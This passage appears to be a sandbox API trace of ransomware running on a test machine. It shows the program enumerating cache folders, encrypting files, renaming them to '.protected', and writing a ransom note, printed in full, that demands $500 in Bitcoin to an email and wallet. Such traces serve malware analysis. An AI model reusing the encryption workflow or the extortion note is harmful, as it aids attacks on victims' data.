(lpString1="Cache", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned 95 [0086.046] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0086.046] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0086.047] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*") returned 97 [0086.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\.") returned 97 [0086.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.049] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\..") returned 98 [0086.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.049] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Windows") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Program Files") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="Program Files (x86)") returned -1 [0086.049] lstrcmpiW (lpString1="0", lpString2="$Recycle.bin") returned 1 [0086.049] lstrcmpiW (lpString1="0", lpString2="System Volume Information") returned -1 [0086.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned 97 [0086.049] lstrcmpW (lpString1="0", lpString2=".") returned 1 [0086.049] lstrcmpW (lpString1="0", lpString2="..") returned 1 [0086.049] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*") returned 99 [0086.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") 
returned 1 [0086.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\.") returned 99 [0086.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.050] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.050] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\..") returned 100 [0086.050] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.050] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Windows") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Program Files") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="Program Files (x86)") returned -1 [0086.050] lstrcmpiW (lpString1="98", lpString2="$Recycle.bin") returned 1 [0086.050] lstrcmpiW (lpString1="98", lpString2="System Volume Information") returned -1 [0086.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned 100 [0086.050] lstrcmpW 
(lpString1="98", lpString2=".") returned 1 [0086.050] lstrcmpW (lpString1="98", lpString2="..") returned 1 [0086.051] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*") returned 102 [0086.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.052] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.052] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.052] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.052] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\.") returned 102 [0086.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.052] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.052] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.052] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\..") returned 103 [0086.052] 
lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.052] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.052] lstrcmpiW (lpString1="B60F3d01", lpString2="Windows") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="Program Files") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="Program Files (x86)") returned -1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="$Recycle.bin") returned 1 [0086.053] lstrcmpiW (lpString1="B60F3d01", lpString2="System Volume Information") returned -1 [0086.053] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.053] StrStrIW (lpFirst="B60F3d01", lpSrch=".protected") returned 0x0 [0086.053] lstrcmpW (lpString1="B60F3d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 
[0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".txt") returned 0x0 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".rar") returned 0x0 [0086.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01") returned 109 [0086.054] StrStrW (lpFirst="B60F3d01", lpSrch=".zip") returned 0x0 [0086.054] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.065] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.065] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.066] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.066] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.066] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.066] CloseHandle (hObject=0x160) returned 1 [0086.066] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.protected") returned 119 [0086.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.protected")) returned 1 [0086.067] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.067] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.067] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\RESTORE_FILES.txt") returned 118 [0086.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.068] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.068] lstrlenA (lpString="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") returned 684 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.068] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.068] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.069] CloseHandle (hObject=0x15c) returned 1 [0086.069] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Windows") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Program Files") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="Program Files (x86)") returned -1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="$Recycle.bin") returned 1 [0086.069] lstrcmpiW (lpString1="A8", lpString2="System Volume Information") returned -1 [0086.069] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned 100 [0086.069] lstrcmpW (lpString1="A8", lpString2=".") returned 1 [0086.069] lstrcmpW (lpString1="A8", lpString2="..") returned 1 [0086.069] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*") returned 102 [0086.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.069] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.069] 
lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\.") returned 102 [0086.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.070] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\..") returned 103 [0086.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.070] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Windows") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Program Files") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="Program Files (x86)") returned -1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="$Recycle.bin") returned 1 [0086.070] lstrcmpiW (lpString1="C3B7Bd01", lpString2="System Volume Information") returned -1 [0086.070] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.070] StrStrIW (lpFirst="C3B7Bd01", lpSrch=".protected") returned 0x0 [0086.070] lstrcmpW (lpString1="C3B7Bd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".txt") returned 0x0 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".rar") returned 0x0 [0086.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01") returned 109 [0086.071] StrStrW (lpFirst="C3B7Bd01", lpSrch=".zip") returned 0x0 [0086.071] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, 
lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.082] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.082] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.082] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.082] CloseHandle (hObject=0x160) returned 1 [0086.083] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.protected") returned 119 [0086.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.protected")) returned 1 [0086.083] 
FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.083] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.084] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\RESTORE_FILES.txt") returned 118 [0086.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.084] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.084] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, 